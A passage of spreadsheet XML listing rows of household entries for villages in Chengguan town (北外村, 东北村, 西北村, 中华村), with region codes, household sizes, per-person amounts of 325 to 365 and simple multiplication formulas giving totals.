        <v>289</v>
      </c>
      <c r="G384" s="17">
        <v>2</v>
      </c>
      <c r="H384" s="18">
        <v>325</v>
      </c>
      <c r="I384" s="17">
        <f>H384*G384</f>
        <v>650</v>
      </c>
      <c r="J384" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K384" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="385" customHeight="1" spans="1:11">
      <c r="A385" s="16" t="s">
        <v>1145</v>
      </c>
      <c r="B385" s="17" t="str">
        <f>B384</f>
        <v>城关镇</v>
      </c>
      <c r="C385" s="17" t="str">
        <f>C384</f>
        <v>北外村</v>
      </c>
      <c r="D385" s="16" t="s">
        <v>1146</v>
      </c>
      <c r="E385" s="16" t="s">
        <v>1147</v>
      </c>
      <c r="F385" s="17" t="str">
        <f>F384</f>
        <v>4113210102</v>
      </c>
      <c r="G385" s="17"/>
      <c r="H385" s="17"/>
      <c r="I385" s="17"/>
      <c r="J385" s="17"/>
      <c r="K385" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="386" customHeight="1" spans="1:11">
      <c r="A386" s="16" t="s">
        <v>1148</v>
      </c>
      <c r="B386" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C386" s="17" t="s">
        <v>230</v>
      </c>
      <c r="D386" s="17" t="s">
        <v>1149</v>
      </c>
      <c r="E386" s="17" t="s">
        <v>382</v>
      </c>
      <c r="F386" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G386" s="17">
        <v>1</v>
      </c>
      <c r="H386" s="18">
        <v>365</v>
      </c>
      <c r="I386" s="17">
        <f>H386*G386</f>
        <v>365</v>
      </c>
      <c r="J386" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K386" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="387" customHeight="1" spans="1:11">
      <c r="A387" s="16" t="s">
        <v>1150</v>
      </c>
      <c r="B387" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C387" s="17" t="s">
        <v>286</v>
      </c>
      <c r="D387" s="17" t="s">
        <v>1151</v>
      </c>
      <c r="E387" s="17" t="s">
        <v>1152</v>
      </c>
      <c r="F387" s="17" t="s">
        <v>289</v>
      </c>
      <c r="G387" s="17">
        <v>2</v>
      </c>
      <c r="H387" s="18">
        <v>325</v>
      </c>
      <c r="I387" s="17">
        <f>H387*G387</f>
        <v>650</v>
      </c>
      <c r="J387" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K387" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="388" customHeight="1" spans="1:11">
      <c r="A388" s="16" t="s">
        <v>1153</v>
      </c>
      <c r="B388" s="17" t="str">
        <f>B387</f>
        <v>城关镇</v>
      </c>
      <c r="C388" s="17" t="str">
        <f>C387</f>
        <v>北外村</v>
      </c>
      <c r="D388" s="16" t="s">
        <v>1154</v>
      </c>
      <c r="E388" s="16" t="s">
        <v>1155</v>
      </c>
      <c r="F388" s="17" t="str">
        <f>F387</f>
        <v>4113210102</v>
      </c>
      <c r="G388" s="17"/>
      <c r="H388" s="17"/>
      <c r="I388" s="17"/>
      <c r="J388" s="17"/>
      <c r="K388" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="389" customHeight="1" spans="1:11">
      <c r="A389" s="16" t="s">
        <v>1156</v>
      </c>
      <c r="B389" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C389" s="17" t="s">
        <v>1038</v>
      </c>
      <c r="D389" s="17" t="s">
        <v>1157</v>
      </c>
      <c r="E389" s="17" t="s">
        <v>1158</v>
      </c>
      <c r="F389" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G389" s="17">
        <v>2</v>
      </c>
      <c r="H389" s="18">
        <v>325</v>
      </c>
      <c r="I389" s="17">
        <f>H389*G389</f>
        <v>650</v>
      </c>
      <c r="J389" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K389" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="390" customHeight="1" spans="1:11">
      <c r="A390" s="16" t="s">
        <v>1159</v>
      </c>
      <c r="B390" s="17" t="str">
        <f>B389</f>
        <v>城关镇</v>
      </c>
      <c r="C390" s="17" t="str">
        <f>C389</f>
        <v>东北村</v>
      </c>
      <c r="D390" s="17" t="s">
        <v>1160</v>
      </c>
      <c r="E390" s="17" t="s">
        <v>584</v>
      </c>
      <c r="F390" s="17" t="str">
        <f>F389</f>
        <v>4113210103</v>
      </c>
      <c r="G390" s="17"/>
      <c r="H390" s="17"/>
      <c r="I390" s="17"/>
      <c r="J390" s="17"/>
      <c r="K390" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="391" customHeight="1" spans="1:11">
      <c r="A391" s="16" t="s">
        <v>1161</v>
      </c>
      <c r="B391" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C391" s="17" t="s">
        <v>1038</v>
      </c>
      <c r="D391" s="17" t="s">
        <v>1162</v>
      </c>
      <c r="E391" s="17" t="s">
        <v>521</v>
      </c>
      <c r="F391" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G391" s="17">
        <v>2</v>
      </c>
      <c r="H391" s="18">
        <v>345</v>
      </c>
      <c r="I391" s="17">
        <f>H391*G391</f>
        <v>690</v>
      </c>
      <c r="J391" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K391" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="392" customHeight="1" spans="1:11">
      <c r="A392" s="16" t="s">
        <v>1163</v>
      </c>
      <c r="B392" s="17" t="str">
        <f>B391</f>
        <v>城关镇</v>
      </c>
      <c r="C392" s="17" t="str">
        <f>C391</f>
        <v>东北村</v>
      </c>
      <c r="D392" s="16" t="s">
        <v>1164</v>
      </c>
      <c r="E392" s="16" t="s">
        <v>630</v>
      </c>
      <c r="F392" s="17" t="str">
        <f>F391</f>
        <v>4113210103</v>
      </c>
      <c r="G392" s="17"/>
      <c r="H392" s="17"/>
      <c r="I392" s="17"/>
      <c r="J392" s="17"/>
      <c r="K392" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="393" customHeight="1" spans="1:11">
      <c r="A393" s="16" t="s">
        <v>1165</v>
      </c>
      <c r="B393" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C393" s="17" t="s">
        <v>1038</v>
      </c>
      <c r="D393" s="17" t="s">
        <v>1166</v>
      </c>
      <c r="E393" s="17" t="s">
        <v>242</v>
      </c>
      <c r="F393" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G393" s="17">
        <v>2</v>
      </c>
      <c r="H393" s="18">
        <v>325</v>
      </c>
      <c r="I393" s="17">
        <f>H393*G393</f>
        <v>650</v>
      </c>
      <c r="J393" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K393" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="394" customHeight="1" spans="1:11">
      <c r="A394" s="16" t="s">
        <v>1167</v>
      </c>
      <c r="B394" s="17" t="str">
        <f>B393</f>
        <v>城关镇</v>
      </c>
      <c r="C394" s="17" t="str">
        <f>C393</f>
        <v>东北村</v>
      </c>
      <c r="D394" s="16" t="s">
        <v>1168</v>
      </c>
      <c r="E394" s="16" t="s">
        <v>1169</v>
      </c>
      <c r="F394" s="17" t="str">
        <f>F393</f>
        <v>4113210103</v>
      </c>
      <c r="G394" s="17"/>
      <c r="H394" s="17"/>
      <c r="I394" s="17"/>
      <c r="J394" s="17"/>
      <c r="K394" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="395" customHeight="1" spans="1:11">
      <c r="A395" s="16" t="s">
        <v>1170</v>
      </c>
      <c r="B395" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C395" s="17" t="s">
        <v>1038</v>
      </c>
      <c r="D395" s="17" t="s">
        <v>1171</v>
      </c>
      <c r="E395" s="17" t="s">
        <v>281</v>
      </c>
      <c r="F395" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G395" s="17">
        <v>1</v>
      </c>
      <c r="H395" s="18">
        <v>365</v>
      </c>
      <c r="I395" s="17">
        <f t="shared" ref="I395:I401" si="14">H395*G395</f>
        <v>365</v>
      </c>
      <c r="J395" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K395" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="396" customHeight="1" spans="1:11">
      <c r="A396" s="16" t="s">
        <v>1172</v>
      </c>
      <c r="B396" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C396" s="17" t="s">
        <v>1038</v>
      </c>
      <c r="D396" s="17" t="s">
        <v>1173</v>
      </c>
      <c r="E396" s="17" t="s">
        <v>633</v>
      </c>
      <c r="F396" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G396" s="17">
        <v>1</v>
      </c>
      <c r="H396" s="18">
        <v>365</v>
      </c>
      <c r="I396" s="17">
        <f t="shared" si="14"/>
        <v>365</v>
      </c>
      <c r="J396" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K396" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="397" customHeight="1" spans="1:11">
      <c r="A397" s="16" t="s">
        <v>1174</v>
      </c>
      <c r="B397" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C397" s="17" t="s">
        <v>1038</v>
      </c>
      <c r="D397" s="17" t="s">
        <v>1175</v>
      </c>
      <c r="E397" s="17" t="s">
        <v>273</v>
      </c>
      <c r="F397" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G397" s="17">
        <v>1</v>
      </c>
      <c r="H397" s="18">
        <v>365</v>
      </c>
      <c r="I397" s="17">
        <f t="shared" si="14"/>
        <v>365</v>
      </c>
      <c r="J397" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K397" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="398" customHeight="1" spans="1:11">
      <c r="A398" s="16" t="s">
        <v>1176</v>
      </c>
      <c r="B398" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C398" s="17" t="s">
        <v>263</v>
      </c>
      <c r="D398" s="17" t="s">
        <v>1177</v>
      </c>
      <c r="E398" s="17" t="s">
        <v>397</v>
      </c>
      <c r="F398" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G398" s="17">
        <v>1</v>
      </c>
      <c r="H398" s="18">
        <v>365</v>
      </c>
      <c r="I398" s="17">
        <f t="shared" si="14"/>
        <v>365</v>
      </c>
      <c r="J398" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K398" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="399" customHeight="1" spans="1:11">
      <c r="A399" s="16" t="s">
        <v>1178</v>
      </c>
      <c r="B399" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C399" s="17" t="s">
        <v>263</v>
      </c>
      <c r="D399" s="17" t="s">
        <v>1179</v>
      </c>
      <c r="E399" s="17" t="s">
        <v>288</v>
      </c>
      <c r="F399" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G399" s="17">
        <v>1</v>
      </c>
      <c r="H399" s="18">
        <v>365</v>
      </c>
      <c r="I399" s="17">
        <f t="shared" si="14"/>
        <v>365</v>
      </c>
      <c r="J399" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K399" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="400" customHeight="1" spans="1:11">
      <c r="A400" s="16" t="s">
        <v>1180</v>
      </c>
      <c r="B400" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C400" s="17" t="s">
        <v>263</v>
      </c>
      <c r="D400" s="17" t="s">
        <v>1181</v>
      </c>
      <c r="E400" s="17" t="s">
        <v>1182</v>
      </c>
      <c r="F400" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G400" s="17">
        <v>1</v>
      </c>
      <c r="H400" s="18">
        <v>365</v>
      </c>
      <c r="I400" s="17">
        <f t="shared" si="14"/>
        <v>365</v>
      </c>
      <c r="J400" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K400" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="401" customHeight="1" spans="1:11">
      <c r="A401" s="16" t="s">
        <v>1183</v>
      </c>
      <c r="B401" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C401" s="17" t="s">
        <v>263</v>
      </c>
      <c r="D401" s="17" t="s">
        <v>1184</v>
      </c>
      <c r="E401" s="17" t="s">
        <v>481</v>
      </c>
      <c r="F401" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G401" s="17">
        <v>2</v>
      </c>
      <c r="H401" s="18">
        <v>325</v>
      </c>
      <c r="I401" s="17">
        <f t="shared" si="14"/>
        <v>650</v>
      </c>
      <c r="J401" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K401" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="402" customHeight="1" spans="1:11">
      <c r="A402" s="16" t="s">
        <v>1185</v>
      </c>
      <c r="B402" s="17" t="str">
        <f>B401</f>
        <v>城关镇</v>
      </c>
      <c r="C402" s="17" t="str">
        <f>C401</f>
        <v>西北村</v>
      </c>
      <c r="D402" s="16" t="s">
        <v>1186</v>
      </c>
      <c r="E402" s="16" t="s">
        <v>269</v>
      </c>
      <c r="F402" s="17" t="str">
        <f>F401</f>
        <v>4113210106</v>
      </c>
      <c r="G402" s="17"/>
      <c r="H402" s="17"/>
      <c r="I402" s="17"/>
      <c r="J402" s="17"/>
      <c r="K402" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="403" customHeight="1" spans="1:11">
      <c r="A403" s="16" t="s">
        <v>1187</v>
      </c>
      <c r="B403" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C403" s="17" t="s">
        <v>1038</v>
      </c>
      <c r="D403" s="17" t="s">
        <v>1188</v>
      </c>
      <c r="E403" s="17" t="s">
        <v>269</v>
      </c>
      <c r="F403" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G403" s="17">
        <v>1</v>
      </c>
      <c r="H403" s="18">
        <v>365</v>
      </c>
      <c r="I403" s="17">
        <f>H403*G403</f>
        <v>365</v>
      </c>
      <c r="J403" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K403" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="404" customHeight="1" spans="1:11">
      <c r="A404" s="16" t="s">
        <v>1189</v>
      </c>
      <c r="B404" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C404" s="17" t="s">
        <v>230</v>
      </c>
      <c r="D404" s="17" t="s">
        <v>1190</v>
      </c>
      <c r="E404" s="17" t="s">
        <v>284</v>
      </c>
      <c r="F404" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G404" s="17">
        <v>1</v>
      </c>
      <c r="H404" s="18">
        <v>365</v>
      </c>
      <c r="I404" s="17">
        <f>H404*G404</f>
        <v>365</v>
      </c>
      <c r="J404" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K404" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="405" customHeight="1" spans="1:11">
      <c r="A405" s="16" t="s">
        <v>1191</v>
      </c>
      <c r="B405" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C405" s="17" t="s">
        <v>230</v>
      </c>
      <c r="D405" s="17" t="s">
        <v>1192</v>
      </c>
      <c r="E405" s="17" t="s">
        <v>1193</v>
      </c>
      <c r="F405" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G405" s="17">
        <v>2</v>
      </c>
      <c r="H405" s="18">
        <v>325</v>
      </c>
      <c r="I405" s="17">
        <f>H405*G405</f>
        <v>650</v>
      </c>
      <c r="J405" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K405" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="406" customHeight="1" spans="1:11">
      <c r="A406" s="16" t="s">
        <v>1194</v>
      </c>
      <c r="B406" s="17" t="str">
        <f>B405</f>
        <v>城关镇</v>
      </c>
      <c r="C406" s="17" t="str">
        <f>C405</f>
        <v>中华村</v>
      </c>
      <c r="D406" s="16" t="s">
        <v>1195</v>
      </c>
      <c r="E406" s="16" t="s">
        <v>1196</v>
      </c>
      <c r="F406" s="17" t="str">
        <f>F405</f>
        <v>4113210108</v>
      </c>
      <c r="G406" s="17"/>
      <c r="H406" s="17"/>
      <c r="I406" s="17"/>
      <c r="J406" s="17"/>
      <c r="K406" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="407" customHeight="1" spans="1:11">
      <c r="A407" s="16" t="s">
        <v>1197</v>
      </c>
      <c r="B407" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C407" s="17" t="s">
        <v>230</v>
      </c>
      <c r="D407" s="17" t="s">
        <v>1198</v>
      </c>
      <c r="E407" s="17" t="s">
        <v>416</v>
      </c>
      <c r="F407" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G407" s="17">
        <v>1</v>
      </c>
      <c r="H407" s="18">
        <v>365</v>
      </c>
      <c r="I407" s="17">
        <f>H407*G407</f>
        <v>365</v>
      </c>
      <c r="J407" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K407" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="408" customHeight="1" spans="1:11">
      <c r="A408" s="16" t="s">
        <v>1199</v>
      </c>
      <c r="B408" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C408" s="17" t="s">
        <v>230</v>
      </c>
      <c r="D408" s="17" t="s">
        <v>1200</v>
      </c>
      <c r="E408" s="17" t="s">
        <v>239</v>
      </c>
      <c r="F408" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G408" s="17">
        <v>1</v>
      </c>
      <c r="H408" s="18">
        <v>365</v>
      </c>
      <c r="I408" s="17">
        <f>H408*G408</f>
        <v>365</v>
      </c>
      <c r="J408" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K408" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="409" customHeight="1" spans="1:11">
      <c r="A409" s="16" t="s">
        <v>1201</v>
      </c>
      <c r="B409" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C409" s="17" t="s">
        <v>230</v>
      </c>
      <c r="D409" s="17" t="s">
        <v>1202</v>
      </c>
      <c r="E409" s="17" t="s">
        <v>1203</v>
      </c>
      <c r="F409" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G409" s="17">
        <v>2</v>
      </c>
      <c r="H409" s="18">
        <v>325</v>
      </c>
      <c r="I409" s="17">
        <f>H409*G409</f>
        <v>650</v>
      </c>
      <c r="J409" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K409" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="410" customHeight="1" spans="1:11">
      <c r="A410" s="16" t="s">
        <v>1204</v>
      </c>
      <c r="B410" s="17" t="str">
        <f>B409</f>
        <v>城关镇</v>
      </c>
      <c r="C410" s="17" t="str">
        <f>C409</f>
        <v>中华村</v>
      </c>
      <c r="D410" s="16" t="s">
        <v>1205</v>
      </c>
      <c r="E410" s="16" t="s">
        <v>269</v>
      </c>
      <c r="F410" s="17" t="str">
        <f>F409</f>
        <v>4113210108</v>
      </c>
      <c r="G410" s="17"/>
      <c r="H410" s="17"/>
      <c r="I410" s="17"/>
      <c r="J410" s="17"/>
      <c r="K410" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="411" customHeight="1" spans="1:11">
      <c r="A411" s="16" t="s">
        <v>1206</v>
      </c>
      <c r="B411" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C411" s="17" t="s">
        <v>230</v>
      </c>
      <c r="D411" s="17" t="s">
        <v>1207</v>
      </c>
      <c r="E411" s="17" t="s">
        <v>292</v>
      </c>
      <c r="F411" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G411" s="17">
        <v>1</v>
      </c>
      <c r="H411" s="18">
        <v>365</v>
      </c>
      <c r="I411" s="17">
        <f t="shared" ref="I411:I422" si="15">H411*G411</f>
        <v>365</v>
      </c>
      <c r="J411" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K411" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="412" customHeight="1" spans="1:11">
      <c r="A412" s="16" t="s">
        <v>1208</v>
      </c>
      <c r="B412" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C412" s="17" t="s">
        <v>1038</v>
      </c>
      <c r="D412" s="17" t="s">
        <v>1209</v>
      </c>
      <c r="E412" s="17" t="s">
        <v>249</v>
      </c>
      <c r="F412" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G412" s="17">
        <v>1</v>
      </c>
      <c r="H412" s="18">
        <v>365</v>
      </c>
      <c r="I412" s="17">
        <f t="shared" si="15"/>
        <v>365</v>
      </c>
      <c r="J412" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K412" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="413" customHeight="1" spans="1:11">
      <c r="A413" s="16" t="s">
        <v>1210</v>
      </c>
      <c r="B413" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C413" s="17" t="s">
        <v>230</v>
      </c>
      <c r="D413" s="17" t="s">
        <v>1211</v>
      </c>
      <c r="E413" s="17" t="s">
        <v>232</v>
      </c>
      <c r="F413" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G413" s="17">
        <v>1</v>
      </c>
      <c r="H413" s="18">
        <v>365</v>
      </c>
      <c r="I413" s="17">
        <f t="shared" si="15"/>
        <v>365</v>
      </c>
      <c r="J413" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K413" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="414" customHeight="1" spans="1:11">
      <c r="A414" s="16" t="s">
        <v>1212</v>
      </c>
      <c r="B414" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C414" s="17" t="s">
        <v>219</v>
      </c>
      <c r="D414" s="17" t="s">
        <v>1213</v>
      </c>
      <c r="E414" s="17" t="s">
        <v>1214</v>
      </c>
      <c r="F414" s="17" t="s">
        <v>1215</v>
      </c>
      <c r="G414" s="17">
        <v>1</v>
      </c>
      <c r="H414" s="18">
        <v>365</v>
      </c>
      <c r="I414" s="17">
        <f t="shared" si="15"/>
        <v>365</v>
      </c>
      <c r="J414" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K414" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="415" customHeight="1" spans="1:11">
      <c r="A415" s="16" t="s">
        <v>1216</v>
      </c>
      <c r="B415" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C415" s="17" t="s">
        <v>230</v>
      </c>
      <c r="D415" s="17" t="s">
        <v>1217</v>
      </c>
      <c r="E415" s="17" t="s">
        <v>288</v>
      </c>
      <c r="F415" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G415" s="17">
        <v>1</v>
      </c>
      <c r="H415" s="18">
        <v>365</v>
      </c>
      <c r="I415" s="17">
        <f t="shared" si="15"/>
        <v>365</v>
      </c>
      <c r="J415" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K415" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="416" customHeight="1" spans="1:11">
      <c r="A416" s="16" t="s">
        <v>1218</v>
      </c>
      <c r="B416" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C416" s="17" t="s">
        <v>263</v>
      </c>
      <c r="D416" s="17" t="s">
        <v>1219</v>
      </c>
      <c r="E416" s="17" t="s">
        <v>281</v>
      </c>
      <c r="F416" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G416" s="17">
        <v>1</v>
      </c>
      <c r="H416" s="18">
        <v>365</v>
      </c>
      <c r="I416" s="17">
        <f t="shared" si="15"/>
        <v>365</v>
      </c>
      <c r="J416" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K416" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="417" customHeight="1" spans="1:11">
      <c r="A417" s="16" t="s">
        <v>1220</v>
      </c>
      <c r="B417" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C417" s="17" t="s">
        <v>1221</v>
      </c>
      <c r="D417" s="17" t="s">
        <v>1222</v>
      </c>
      <c r="E417" s="17" t="s">
        <v>337</v>
      </c>
      <c r="F417" s="17" t="s">
        <v>1215</v>
      </c>
      <c r="G417" s="17">
        <v>1</v>
      </c>
      <c r="H417" s="18">
        <v>365</v>
      </c>
      <c r="I417" s="17">
        <f t="shared" si="15"/>
        <v>365</v>
      </c>
      <c r="J417" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K417" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="418" customHeight="1" spans="1:11">
      <c r="A418" s="16" t="s">
        <v>1223</v>
      </c>
      <c r="B418" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C418" s="17" t="s">
        <v>1224</v>
      </c>
      <c r="D418" s="17" t="s">
        <v>1225</v>
      </c>
      <c r="E418" s="17" t="s">
        <v>1226</v>
      </c>
      <c r="F418" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G418" s="17">
        <v>1</v>
      </c>
      <c r="H418" s="18">
        <v>365</v>
      </c>
      <c r="I418" s="17">
        <f t="shared" si="15"/>
        <v>365</v>
      </c>
      <c r="J418" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K418" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="419" customHeight="1" spans="1:11">
      <c r="A419" s="16" t="s">
        <v>1227</v>
      </c>
      <c r="B419" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C419" s="17" t="s">
        <v>230</v>
      </c>
      <c r="D419" s="17" t="s">
        <v>1228</v>
      </c>
      <c r="E419" s="17" t="s">
        <v>526</v>
      </c>
      <c r="F419" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G419" s="17">
        <v>1</v>
      </c>
      <c r="H419" s="18">
        <v>365</v>
      </c>
      <c r="I419" s="17">
        <f t="shared" si="15"/>
        <v>365</v>
      </c>
      <c r="J419" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K419" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="420" customHeight="1" spans="1:11">
      <c r="A420" s="16" t="s">
        <v>1229</v>
      </c>
      <c r="B420" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C420" s="17" t="s">
        <v>1230</v>
      </c>
      <c r="D420" s="17" t="s">
        <v>1231</v>
      </c>
      <c r="E420" s="17" t="s">
        <v>258</v>
      </c>
      <c r="F420" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G420" s="17">
        <v>3</v>
      </c>
      <c r="H420" s="18">
        <v>345</v>
      </c>
      <c r="I420" s="17">
        <f t="shared" si="15"/>
        <v>1035</v>
      </c>
      <c r="J420" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K420" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="421" customHeight="1" spans="1:11">
      <c r="A421" s="16" t="s">
        <v>1232</v>
      </c>
      <c r="B421" s="17" t="str">
        <f>B420</f>
        <v>城关镇</v>
      </c>
      <c r="C421" s="17" t="str">
        <f>C420</f>
        <v>城关镇中华村</v>
      </c>
      <c r="D421" s="24" t="s">
        <v>1233</v>
      </c>
      <c r="E421" s="24" t="s">
        <v>1234</v>
      </c>
      <c r="F421" s="17" t="str">
        <f>F420</f>
        <v>4113210108</v>
      </c>
      <c r="G421" s="17"/>
      <c r="H421" s="17"/>
      <c r="I421" s="17"/>
      <c r="J421" s="17"/>
      <c r="K421" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="422" customHeight="1" spans="1:11">
      <c r="A422" s="16" t="s">
        <v>1235</v>
      </c>
      <c r="B422" s="17" t="str">
        <f>B421</f>
        <v>城关镇</v>
      </c>
      <c r="C422" s="17" t="str">
        <f>C421</f>
        <v>城关镇中华村</v>
      </c>
      <c r="D422" s="23" t="s">
        <v>1236</v>
      </c>
      <c r="E422" s="24" t="s">
        <v>1237</v>
      </c>
      <c r="F422" s="17" t="str">
        <f>F421</f>
        <v>4113210108</v>
      </c>
      <c r="G422" s="17"/>
      <c r="H422" s="17"/>
      <c r="I422" s="17"/>
      <c r="J422" s="17"/>
      <c r="K422" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="423" customHeight="1" spans="1:11">
      <c r="A423" s="16" t="s">
        <v>1238</v>
      </c>
      <c r="B423" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C423" s="17" t="s">
        <v>1038</v>
      </c>
      <c r="D423" s="17" t="s">
        <v>1239</v>
      </c>
      <c r="E423" s="17" t="s">
        <v>1240</v>
      </c>
      <c r="F423" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G423" s="17">
        <v>1</v>
      </c>
      <c r="H423" s="18">
        <v>365</v>
      </c>
      <c r="I423" s="17">
        <f>H423*G423</f>
        <v>365</v>
      </c>
      <c r="J423" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K423" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="424" customHeight="1" spans="1:11">
      <c r="A424" s="16" t="s">
        <v>1241</v>
      </c>
      <c r="B424" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C424" s="17" t="s">
        <v>263</v>
      </c>
      <c r="D424" s="17" t="s">
        <v>1242</v>
      </c>
      <c r="E424" s="17" t="s">
        <v>258</v>
      </c>
      <c r="F424" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G424" s="17">
        <v>2</v>
      </c>
      <c r="H424" s="18">
        <v>325</v>
      </c>
      <c r="I424" s="17">
        <f>H424*G424</f>
        <v>650</v>
      </c>
      <c r="J424" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K424" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="425" customHeight="1" spans="1:11">
      <c r="A425" s="16" t="s">
        <v>1243</v>
      </c>
      <c r="B425" s="17" t="str">
        <f>B424</f>
        <v>城关镇</v>
      </c>
      <c r="C425" s="17" t="str">
        <f>C424</f>
        <v>西北村</v>
      </c>
